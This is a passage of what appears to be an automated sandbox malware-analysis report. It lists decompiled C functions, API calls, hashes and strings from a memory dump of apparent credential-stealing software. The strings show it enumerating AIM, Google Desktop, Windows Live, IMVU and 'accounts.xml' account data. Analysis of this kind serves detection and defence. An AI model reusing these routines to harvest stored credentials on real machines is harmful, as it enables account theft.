						_t30 = _t31 + 0xc;
						if(_t21 == 0) {
							E00407A93(_a4, _v16,  &_v272);
							RegCloseKey(_v16);
						}
						_t19 =  &_v272;
						_t26 = _t26 + 1;
						0x411dee(_v12, _t26, _t19);
					}
					return RegCloseKey(_v12);
				}
				return _t16;
			}















                                          0x00407bd1
                                          0x00407bdf
                                          0x00407be4
                                          0x00407be9
                                          0x00407bf4
                                          0x00407bfe
                                          0x00407c05
                                          0x00407c0a
                                          0x00407c0d
                                          0x00407c18
                                          0x00407c67
                                          0x00407c67
                                          0x00407c6c
                                          0x00000000
                                          0x00000000
                                          0x00407c29
                                          0x00407c33
                                          0x00407c38
                                          0x00407c3d
                                          0x00407c4c
                                          0x00407c54
                                          0x00407c54
                                          0x00407c56
                                          0x00407c5d
                                          0x00407c62
                                          0x00407c62
                                          0x00000000
                                          0x00407c71
                                          0x00407c76

                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • memset.MSVCRT ref: 00407C05
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • RegCloseKey.ADVAPI32(?), ref: 00407C54
                                          • RegCloseKey.ADVAPI32(?), ref: 00407C71
                                          Strings
                                          • Software\Google\Google Desktop\Mailboxes, xrefs: 00407BD5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Close$EnumOpenmemset
                                          • String ID: Software\Google\Google Desktop\Mailboxes
                                          • API String ID: 2255314230-2212045309
                                          • Opcode ID: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
                                          • Instruction ID: a9c93927ac610b6ef28ec82afd47bdb8c9c4627465144405bf34b6a811739c17
                                          • Opcode Fuzzy Hash: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
                                          • Instruction Fuzzy Hash: E9115EB6D04118BADF21AB91EC41FDEBB7CDF55304F0041B6BA04E1051E7756B94CEA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403BF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00403BF0(intOrPtr __ecx, void* __edx, void* __eflags, long long __fp0, void* _a4) {
				intOrPtr _v8;
				char _v272;
				void _v528;
				void _v536;
				char _v540;
				intOrPtr _v544;
				void* __edi;
				void* __esi;
				void* _t24;
				char* _t27;
				intOrPtr _t32;
				void* _t37;
				void* _t40;
				char* _t44;
				void* _t46;

				_v544 = __ecx;
				_v540 = 0x417ea8;
				E0040D77D( &_v528);
				memset( &_v536, 0, 0x214);
				_t24 = memcpy( &_v528, _a4, 0x82 << 2);
				0x413d62( &_v272,  &_v528, _t40, _t46);
				_pop(_t37);
				if(_t24 != 0) {
					_t44 =  &_v272;
					_v8 = E004037A2(_t44, __fp0);
					_t27 = _t44;
					0x413d74( &_v528);
					_t37 = _t27;
					if(_t27 == 0) {
						_t32 = 0xa;
						if(_v8 > _t32) {
							_v8 = _t32;
						}
					}
				} else {
					_v8 = 1;
				}
				E00409D21(_t37, _v544,  &_v540);
				return 1;
			}


















                                          0x00403c02
                                          0x00403c06
                                          0x00403c0e
                                          0x00403c1f
                                          0x00403c40
                                          0x00403c42
                                          0x00403c4a
                                          0x00403c4b
                                          0x00403c5a
                                          0x00403c66
                                          0x00403c72
                                          0x00403c75
                                          0x00403c7d
                                          0x00403c7e
                                          0x00403c82
                                          0x00403c8a
                                          0x00403c8c
                                          0x00403c8c
                                          0x00403c8a
                                          0x00403c4d
                                          0x00403c4d
                                          0x00403c4d
                                          0x00403c9c
                                          0x00403ca9

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscmp_mbsicmpmemset
                                          • String ID: :@
                                          • API String ID: 1080945674-3074689909
                                          • Opcode ID: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
                                          • Instruction ID: 05d51c46cf4b3144aa59074ae4edee5e5c3f47845a6acae635e5c8c721b5e64e
                                          • Opcode Fuzzy Hash: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
                                          • Instruction Fuzzy Hash: 9911867250C3459AD720EEA5E809BDB77DCEB84315F004D3FF594E3181E7749609879A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041051F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcsnicmp.MSVCRT ref: 0041053E
                                            • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                            • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410570
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410587
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWidememset$_wcsnicmp
                                          • String ID: windowslive:name=
                                          • API String ID: 947294041-3311407311
                                          • Opcode ID: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
                                          • Instruction ID: aaacd06d763df2f40df435721f5dd751edfa9d120b015f6101ff871e9026a9e8
                                          • Opcode Fuzzy Hash: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
                                          • Instruction Fuzzy Hash: A80184B6604209BFD710DF59DC84DD77BECEB49364F10462ABA28D72A1D630DD04CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F2E1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F325
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F339
                                          • _wcsnicmp.MSVCRT ref: 0040F347
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide$_wcsnicmp
                                          • String ID: http://www.imvu.com
                                          • API String ID: 1082246498-3717390816
                                          • Opcode ID: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
                                          • Instruction ID: a621eff572e40bce3e368aabcc4a0ad2a08d37bae4b59898fbad6a548f86f146
                                          • Opcode Fuzzy Hash: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
                                          • Instruction Fuzzy Hash: CD1152B2544349AED7309E599C84EEB7FACEB89364F10062EB96892191D7305A14C6B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410894, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.MSVCRT ref: 004108AE
                                          • memcpy.MSVCRT ref: 004108C0
                                          • DialogBoxParamA.USER32(0000006B,?,Function_000105A6,00000000), ref: 004108E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpy$DialogParam
                                          • String ID: ;4
                                          • API String ID: 392721444-4181167889
                                          • Opcode ID: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
                                          • Instruction ID: 2aaa1d25541d53f243854b8b99eb4e9492d8e88977a0f1258d463d5600498ee3
                                          • Opcode Fuzzy Hash: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
                                          • Instruction Fuzzy Hash: 86F0A771A44730BBF7216F55BC06BC67A91AB08B06F218036F545A51D0C3B925D08FDC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406B6F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 40%
                                          			E00406B6F(struct HWND__* _a4) {
				void _v259;
				char _v260;
				signed int _t10;

				_v260 = 0;
				memset( &_v259, 0, 0xff);
				GetClassNameA(_a4,  &_v260, 0xff);
				_t10 =  &_v260;
				0x413dce(_t10, "edit");
				asm("sbb eax, eax");
				return  ~_t10 + 1;
			}






                                          0x00406b88
                                          0x00406b8f
                                          0x00406ba2
                                          0x00406ba8
                                          0x00406bb4
                                          0x00406bbd
                                          0x00406bc2

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ClassName_strcmpimemset
                                          • String ID: edit
                                          • API String ID: 275601554-2167791130
                                          • Opcode ID: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
                                          • Instruction ID: aca7036e1f85a757735cd09c7bf6aa39e2ce89dfda263754777898d954571a1f
                                          • Opcode Fuzzy Hash: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
                                          • Instruction Fuzzy Hash: 61E09BB3C5012A6ADB11AA64EC05FE5376C9F54705F0001F6B949E2081E5B457C44B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00401085(void* __edi) {
				struct tagLOGFONTA _v64;
				int* _t12;

				E00406A19( &_v64, "MS Sans Serif", 0xa, 1);
				_t12 = __edi + 0x20c;
				 *_t12 = CreateFontIndirectA( &_v64);
				return SendMessageA(GetDlgItem( *(__edi + 4), 0x3ec), 0x30,  *_t12, 0);
			}





                                          0x00401098
                                          0x004010a4
                                          0x004010b8
                                          0x004010cf

                                          APIs
                                            • Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
                                            • Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63
                                          • CreateFontIndirectA.GDI32(?), ref: 004010AA
                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BA
                                          • SendMessageA.USER32(00000000,00000030,?,00000000), ref: 004010C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFontIndirectItemMessageSend_mbscpymemset
                                          • String ID: MS Sans Serif
                                          • API String ID: 2650341901-168460110
                                          • Opcode ID: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
                                          • Instruction ID: 5c9505941c48c8dd7a2399cb1aaf590a0077e647136f214fd0fe6491ebdd60b9
                                          • Opcode Fuzzy Hash: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
                                          • Instruction Fuzzy Hash: 67E06D71A40604FBCB116BA0EC0AFCABB6CAB44700F108125FA51B60E1D7B0A114CB88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00412192, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: SHGetSpecialFolderPathA$shell32.dll
                                          • API String ID: 2574300362-543337301
                                          • Opcode ID: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
                                          • Instruction ID: a03a44e40ad870f41b9c2d8f2e6b277420dcc77a40eb9148cfb32e265f33a348
                                          • Opcode Fuzzy Hash: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
                                          • Instruction Fuzzy Hash: 2ED0C978A00302EBEB20DF61BD597D63FA8A74C711F20C036F905D2262DBB865D0CA2C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00412D65, Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
                                          • Instruction ID: 077d2ad6405c458e4821e20ddf5ab0b81a66c3d9f88b424bd3f36c9f492752c9
                                          • Opcode Fuzzy Hash: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
                                          • Instruction Fuzzy Hash: F0310AB4A007008FDB609F2AD945692FBF4FF84305F25886FD549CB262D7B8D491CB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004116A9, Relevance: 6.3, APIs: 5, Instructions: 51stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpistrchr$_mbscpymemsetstrrchr
                                          • String ID:
                                          • API String ID: 274398480-0
                                          • Opcode ID: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
                                          • Instruction ID: 328b4c9133cd54f2635944cbca80cb08cea31e8af7c0159c33255436c65d5f23
                                          • Opcode Fuzzy Hash: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
                                          • Instruction Fuzzy Hash: C601D6756082087AEB20BB72DC03FCB3B9C8F1175AF10005FF689A50D1EEA8D6C146AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C9C7, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040C9C7(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040CA46(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040CA46(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}










                                          0x0040c9c7
                                          0x0040c9cf
                                          0x0040c9d0
                                          0x0040c9d2
                                          0x0040c9d6
                                          0x0040c9d9
                                          0x0040c9db
                                          0x0040c9df
                                          0x0040ca0e
                                          0x0040c9e1
                                          0x0040c9e6
                                          0x0040c9eb
                                          0x0040c9f2
                                          0x0040c9fc
                                          0x0040ca04
                                          0x0040ca19
                                          0x0040ca1f
                                          0x0040ca27
                                          0x0040ca33
                                          0x0040ca45

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
                                          • Instruction ID: 72ff1d110960cc82dd2bfc388b685e2dd0a1937d99bf851f24f672c8116534dd
                                          • Opcode Fuzzy Hash: db955d66aa391fc484fd506110ad959e30d2163aa55218731a18cbda7d247bce
                                          • Instruction Fuzzy Hash: 4C0128B1740B00B6D231EF29DC43F6A7BA49F91B18F100B1EF1526A6C1E7B8B244865D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040AE7D, Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E0040AE7D(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E0040972B(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t63 = _v12;
					 *0x41e394 =  *0x41e394 + 1;
					 *((intOrPtr*)(0x41e398 +  *0x41e394 * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E00407139(0, _a4);
						_t67 = E00407139(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					0x413d74(_t72, _a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					0x413d74(_t74, _a4);
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}





















                                          0x0040ae84
                                          0x0040ae86
                                          0x0040ae8b
                                          0x0040ae8d
                                          0x0040ae90
                                          0x0040ae90
                                          0x0040ae9a
                                          0x00000000
                                          0x00000000
                                          0x0040ae9c
                                          0x0040aea0
                                          0x00000000
                                          0x00000000
                                          0x0040aeac
                                          0x00000000
                                          0x00000000
                                          0x0040aeb1
                                          0x0040aeb9
                                          0x0040aeda
                                          0x0040aeda
                                          0x0040afbb
                                          0x0040afc0
                                          0x0040afc2
                                          0x0040afc2
                                          0x0040afcf
                                          0x0040afd2
                                          0x0040afd8
                                          0x0040afe0
                                          0x0040afe0
                                          0x0040aee3
                                          0x0040aee5
                                          0x0040aeec
                                          0x0040aeef
                                          0x0040aef2
                                          0x0040af56
                                          0x0040af56
                                          0x0040af58
                                          0x0040af5e
                                          0x0040af61
                                          0x0040afb9
                                          0x00000000
                                          0x0040afba
                                          0x0040af63
                                          0x0040af63
                                          0x0040af65
                                          0x0040af83
                                          0x0040af88
                                          0x0040af8d
                                          0x0040af93
                                          0x0040af99
                                          0x0040afa2
                                          0x00000000
                                          0x0040afa2
                                          0x0040af95
                                          0x0040af97
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040afa5
                                          0x0040afa5
                                          0x0040afab
                                          0x0040afae
                                          0x0040afb1
                                          0x0040afb1
                                          0x00000000
                                          0x0040af65
                                          0x0040aef4
                                          0x0040aef4
                                          0x0040aef6
                                          0x0040aefc
                                          0x0040af04
                                          0x0040af0c
                                          0x0040af12
                                          0x0040af17
                                          0x0040af1c
                                          0x0040af1f
                                          0x0040af23
                                          0x0040af29
                                          0x0040af32
                                          0x0040af35
                                          0x00000000
                                          0x0040af35
                                          0x0040af25
                                          0x0040af27
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040af3c
                                          0x0040af3c
                                          0x0040af42
                                          0x0040af45
                                          0x0040af48
                                          0x0040af48
                                          0x0040af50
                                          0x0040af54
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                            • Part of subcall function 0040972B: ??2@YAPAXI@Z.MSVCRT ref: 0040974C
                                            • Part of subcall function 0040972B: ??3@YAXPAX@Z.MSVCRT ref: 00409813
                                          • strlen.MSVCRT ref: 0040AEA3
                                          • atoi.MSVCRT ref: 0040AEB1
                                          • _mbsicmp.MSVCRT ref: 0040AF04
                                          • _mbsicmp.MSVCRT ref: 0040AF17
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                          • String ID:
                                          • API String ID: 4107816708-0
                                          • Opcode ID: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
                                          • Instruction ID: 08bf478f3eb11018bf028c01ffb7f168253fa3ae9792e106a9a4f60ade7b3b20
                                          • Opcode Fuzzy Hash: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
                                          • Instruction Fuzzy Hash: B8414975900305EFCB11DF69D580A9ABBF4FB48308F1084BAEC15AB392D778DA51CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413646, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen
                                          • String ID: >$>$>
                                          • API String ID: 39653677-3911187716
                                          • Opcode ID: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
                                          • Instruction ID: dc7a302430b06bbc29ce8331a0d654e54ba56492e0c60a2da2e35593be10561b
                                          • Opcode Fuzzy Hash: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
                                          • Instruction Fuzzy Hash: 7B31FBA580D2C4AED7219F6880557EEFFA14F22305F1886DAC0D447383C22C9BCAD75A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040EA56, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040EA89
                                          • strlen.MSVCRT ref: 0040EA8F
                                          • strlen.MSVCRT ref: 0040EA9C
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: accounts.xml
                                          • API String ID: 581844971-666780623
                                          • Opcode ID: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
                                          • Instruction ID: 3a6749a91d87314aa81efbea2023e77c1fe97455d9ba7aea10baf3c7dddfb932
                                          • Opcode Fuzzy Hash: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
                                          • Instruction Fuzzy Hash: 9C210471A041186BCB10EB66DC416DFB7F8AF55314F0484BBE009E7142DBB8EA958FE8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040EB3D, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040EB70
                                          • strlen.MSVCRT ref: 0040EB76
                                          • strlen.MSVCRT ref: 0040EB83
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: accounts.xml
                                          • API String ID: 581844971-666780623
                                          • Opcode ID: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
                                          • Instruction ID: f45e0dada1ac7c46e734b25b908a600237734d5f3cbc55dd7ef5ba4cf50aaebb
                                          • Opcode Fuzzy Hash: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
                                          • Instruction Fuzzy Hash: AD21F5719041185BDB11EB26DC41ACA77BC5F51314F0484BBA508E7141DBB8EAD68FD8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407364, Relevance: 6.1, APIs: 4, Instructions: 65stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00407364(void* __eax, char* _a4, int _a8) {
				void* __edi;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t44;
				intOrPtr _t52;
				intOrPtr* _t54;
				intOrPtr* _t55;
				void* _t56;

				_t56 = __eax;
				if(_a8 == 0xffffffff) {
					_a8 = strlen(_a4);
				}
				_t44 =  *((intOrPtr*)(_t56 + 4));
				_t52 = _t44 + _a8 + 1;
				_t30 =  *((intOrPtr*)(_t56 + 0x14));
				 *((intOrPtr*)(_t56 + 4)) = _t52;
				_t54 = _t56 + 0x10;
				if(_t52 != 0xffffffff) {
					E00406982(_t56, _t52, _t54, 1, _t30);
				} else {
					0x413de6( *_t54);
				}
				_t53 =  *(_t56 + 0x1c);
				_t33 =  *((intOrPtr*)(_t56 + 0x18));
				_t55 = _t56 + 0xc;
				if( *(_t56 + 0x1c) != 0xffffffff) {
					E00406982(_t56 + 8, _t53, _t55, 4, _t33);
				} else {
					0x413de6( *_t55);
				}
				memcpy( *((intOrPtr*)(_t56 + 0x10)) + _t44, _a4, _a8);
				 *((char*)( *((intOrPtr*)(_t56 + 0x10)) + _t44 + _a8)) = 0;
				 *((intOrPtr*)( *_t55 +  *(_t56 + 0x1c) * 4)) = _t44;
				 *(_t56 + 0x1c) =  *(_t56 + 0x1c) + 1;
				_t27 =  *(_t56 + 0x1c) - 1; // -1
				return _t27;
			}











                                          0x0040736e
                                          0x00407370
                                          0x0040737b
                                          0x0040737b
                                          0x0040737e
                                          0x00407384
                                          0x0040738b
                                          0x0040738e
                                          0x00407391
                                          0x00407394
                                          0x004073a4
                                          0x00407396
                                          0x00407398
                                          0x00407398
                                          0x004073aa
                                          0x004073b0
                                          0x004073b4
                                          0x004073b7
                                          0x004073c8
                                          0x004073b9
                                          0x004073bb
                                          0x004073bb
                                          0x004073db
                                          0x004073e8
                                          0x004073f4
                                          0x004073f7
                                          0x004073fe
                                          0x00407404

                                          APIs
                                          • strlen.MSVCRT ref: 00407375
                                            • Part of subcall function 00406982: malloc.MSVCRT ref: 0040699E
                                            • Part of subcall function 00406982: memcpy.MSVCRT ref: 004069B6
                                            • Part of subcall function 00406982: ??3@YAXPAX@Z.MSVCRT ref: 004069BF
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407398
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004073BB
                                          • memcpy.MSVCRT ref: 004073DB
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocstrlen
                                          • String ID:
                                          • API String ID: 1171893557-0
